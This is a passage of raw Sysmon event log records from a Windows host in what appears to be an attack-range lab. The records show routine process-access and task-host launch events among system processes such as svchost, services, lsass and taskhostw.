22:13:19.348{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 154100x8000000000000000361191Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.349{8e433fbf-36ff-6013-ab03-000000001100}7204C:\Windows\System32\taskhostw.exe10.0.18362.387 (WinBuild.160101.0800)Host Process for Windows TasksMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskhostw.exetaskhostw.exe Install $(Arg0)C:\Windows\system32\IP-0A000111\Administrator{8e433fbf-337a-6013-b5aa-3d0000000000}0x3daab52HighMD5=8AC325C757FA721B272ECEA19EBCF745,SHA256=0BEC3128B241FA533DC5A9D3F62AA41323D205DEFC30DCDE228C5ECC2D1E50A9,IMPHASH=9CB27CAED52CB0AFFB32788922A0D083{8e433fbf-2a45-6013-1e00-000000001100}1640C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule 10341000x8000000000000000361190Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.348{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-337a-6013-7602-000000001100}6288C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+35dc1|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361189Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.332{8e433fbf-337a-6013-7402-000000001100}62681424C:\Windows\system32\sihost.exe{8e433fbf-36ff-6013-a803-000000001100}8680C:\Windows\system32\backgroundTaskHost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\activationmanager.dll+cd0b|C:\Windows\system32\activationmanager.dll+c217|C:\Windows\system32\activationmanager.dll+bd76|C:\Windows\system32\activationmanager.dll+e352|C:\Windows\System32\twinui.appcore.dll+3641|C:\Windows\system32\twinapi.appcore.dll+1e181|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480 10341000x8000000000000000361188Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.316{8e433fbf-2a44-6013-1100-000000001100}11165232C:\Windows\system32\svchost.exe{8e433fbf-36ff-6013-a803-000000001100}8680C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|c:\windows\system32\rpcss.dll+32369|c:\windows\system32\rpcss.dll+319fb|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361187Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.316{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-36ff-6013-a803-000000001100}8680C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rpcss.dll+46b32|c:\windows\system32\rpcss.dll+46af3|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361186Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.316{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-36ff-6013-a803-000000001100}8680C:\Windows\system32\backgroundTaskHost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|c:\windows\system32\psmsrv.dll+82ab|c:\windows\system32\psmsrv.dll+8216|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361185Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.316{8e433fbf-2a44-6013-0a00-000000001100}9044540C:\Windows\system32\services.exe{8e433fbf-36ff-6013-aa03-000000001100}4824C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\system32\services.exe+1c74|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361184Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.316{8e433fbf-2a44-6013-1100-000000001100}11165232C:\Windows\system32\svchost.exe{8e433fbf-36ff-6013-aa03-000000001100}4824C:\Windows\System32\svchost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|c:\windows\system32\rpcss.dll+32369|c:\windows\system32\rpcss.dll+319fb|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361183Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.316{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-36ff-6013-aa03-000000001100}4824C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rpcss.dll+46b32|c:\windows\system32\rpcss.dll+46af3|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361182Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.301{8e433fbf-2a44-6013-0600-000000001100}7565040C:\Windows\system32\csrss.exe{8e433fbf-36ff-6013-aa03-000000001100}4824C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000361181Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.301{8e433fbf-2a44-6013-0a00-000000001100}9042540C:\Windows\system32\services.exe{8e433fbf-36ff-6013-aa03-000000001100}4824C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5b3d3|C:\Windows\System32\KERNEL32.DLL+1c9af|C:\Windows\system32\services.exe+b626|C:\Windows\system32\services.exe+e42b|C:\Windows\system32\services.exe+c695|C:\Windows\system32\services.exe+c304|C:\Windows\system32\services.exe+f1e0|C:\Windows\system32\services.exe+e0b6|C:\Windows\system32\services.exe+d98b|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2 10341000x8000000000000000361180Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.301{8e433fbf-2a44-6013-0c00-000000001100}9804888C:\Windows\system32\lsass.exe{8e433fbf-2a44-6013-0a00-000000001100}904C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\lsasrv.dll+31ff3|C:\Windows\system32\lsasrv.dll+2fb89|C:\Windows\system32\lsasrv.dll+2e5cf|C:\Windows\system32\lsasrv.dll+2aaa9|C:\Windows\system32\lsasrv.dll+2a418|C:\Windows\system32\lsasrv.dll+149ab|C:\Windows\SYSTEM32\SspiSrv.dll+177c|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361179Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.301{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a44-6013-0c00-000000001100}980C:\Windows\system32\lsass.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10daa|c:\windows\system32\lsm.dll+1008d|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361178Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.301{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a44-6013-0c00-000000001100}980C:\Windows\system32\lsass.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+ff97|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361177Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.301{8e433fbf-2a44-6013-0c00-000000001100}9804888C:\Windows\system32\lsass.exe{8e433fbf-2a44-6013-0a00-000000001100}904C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\lsasrv.dll+29d90|C:\Windows\system32\lsasrv.dll+149ab|C:\Windows\SYSTEM32\SspiSrv.dll+177c|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361176Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.285{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-337a-6013-7602-000000001100}6288C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+35dc1|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361175Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.285{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361174Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.285{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361173Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.285{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361172Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.285{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 154100x8000000000000000361171Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.291{8e433fbf-36ff-6013-a903-000000001100}1332C:\Windows\System32\taskhostw.exe10.0.18362.387 (WinBuild.160101.0800)Host Process for Windows TasksMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskhostw.exetaskhostw.exe -RegisterDevice -AccountChangeC:\Windows\system32\NT AUTHORITY\SYSTEM{8e433fbf-2a44-6013-e703-000000000000}0x3e70SystemMD5=8AC325C757FA721B272ECEA19EBCF745,SHA256=0BEC3128B241FA533DC5A9D3F62AA41323D205DEFC30DCDE228C5ECC2D1E50A9,IMPHASH=9CB27CAED52CB0AFFB32788922A0D083{8e433fbf-2a45-6013-1e00-000000001100}1640C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule 10341000x8000000000000000361170Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.285{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-337a-6013-7602-000000001100}6288C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+35dc1|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361169Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.285{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-1e00-000000001100}1640C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+ec7a|c:\windows\system32\lsm.dll+13166|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361168Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.285{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-1e00-000000001100}1640C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+f537|c:\windows\system32\lsm.dll+13087|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SY